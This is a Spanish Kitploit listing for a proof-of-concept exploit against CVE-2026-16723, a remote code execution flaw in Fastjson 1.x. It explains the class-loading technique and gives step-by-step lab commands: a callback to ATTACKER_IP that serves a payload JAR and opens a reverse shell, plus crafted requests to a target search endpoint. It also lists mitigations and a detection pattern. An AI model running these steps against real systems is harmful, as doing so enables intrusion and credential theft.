Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-16723 — Prueba de concepto de exploit para CVE-2026-16723, una vulnerabilidad de ejecución remota de código en Fastjson 1.x @JSONType, con un generador de JAR de payload y un listener de reverse shell. | Kitploit
Herramientas/GitHubGitHub/yym8538/cve-2026-16723
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubyym8538/cve-2026-16723

CVE-2026-16723

Prueba de concepto de exploit para CVE-2026-16723, una vulnerabilidad de ejecución remota de código en Fastjson 1.x @JSONType, con un generador de JAR de payload y un listener de reverse shell.

Ver Repositorio
1hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


Descripción general

CVE-2026-16723 es una vulnerabilidad de Ejecución Remota de Código (RCE) en Fastjson 1.x (1.2.68 – 1.2.83). Cuando Fastjson analiza JSON controlado por el atacante, un valor @type manipulado se convierte en una búsqueda de recurso de clase dentro de checkAutoType. En un fat-JAR ejecutable de Spring Boot, el cargador de clases resuelve ese nombre como una URL jar:http:// y obtiene un JAR remoto (SSRF), luego carga una clase que lleva la anotación @JSONType aunque AutoType esté deshabilitado. Debido a que un JDK / Tomcat moderno rechaza el nombre binario jar:http://, la variante fiable inserta el JAR en la caché de la JVM y lo vuelve a leer a través de jar:file:/proc/self/fd/N, de modo que la clase se define y su inicializador estático se ejecuta, otorgando ejecución de código. AutoType permanece deshabilitado y no se requiere ningún gadget del classpath.


Versiones afectadas

CategoríaVersión
VulnerableFastjson 1.2.68 ≤ versión ≤ 1.2.83
ParcheadaMigrar a Fastjson 2.x (no hay versión 1.x corregida)

Impacto

  • Ejecución Remota de Código como la cuenta de servicio
  • Divulgación de secretos / credenciales desde el host y el entorno
  • Compromiso total de la aplicación afectada

Entorno

El objetivo del laboratorio es una tienda pública (Northwind Store) cuya API de búsqueda enlaza su cuerpo de solicitud con Fastjson. Todo es la configuración predeterminada de Fastjson: SafeMode desactivado, AutoType desactivado, empaquetado como un fat-JAR de Spring Boot.

docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
PrecondiciónEstado en este laboratorio
Fastjson 1.2.68 – 1.2.831.2.83
fat-JAR ejecutable de Spring Bootsí
Ruta de análisis JSON no autenticadaPOST /api/products/search
SafeMode / AutoTypepredeterminado (ambos desactivados)

PoC

El atacante y el objetivo se ejecutan en la misma red bridge de Docker, por lo que el objetivo alcanza al atacante como una conexión saliente (no se publica ningún puerto adicional).

Paso 1. Confirmar que el objetivo está activo

curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

Paso 2. Ejecutar el exploit en la máquina atacante

exploit.py construye el JAR del payload, lo sirve, inicia un listener e imprime el cuerpo de la solicitud. Solo se requiere la dirección de callback.

python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

Paso 3. Entregar el payload

Pega el cuerpo impreso en el endpoint de búsqueda (Burp Repeater o curl) y envíalo. La solicitud de búsqueda es una funcionalidad normal; solo su cuerpo JSON está manipulado.

curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

Paso 4. Confirmar el resultado

El código se ejecuta como la cuenta de servicio. Recupera la flag a través de la shell obtenida:

whoami

Mitigación

  • Migrar a Fastjson 2.x
  • O ejecutar com.alibaba:fastjson:1.2.83_noneautotype
  • O iniciar la JVM con -Dfastjson.parser.safeMode=true
  • Detección: valores @type de JSON que contengan patrones jar:http o jar:file / /proc/self/fd

Análisis

  • KR:
  • EN:
Descargar herramienta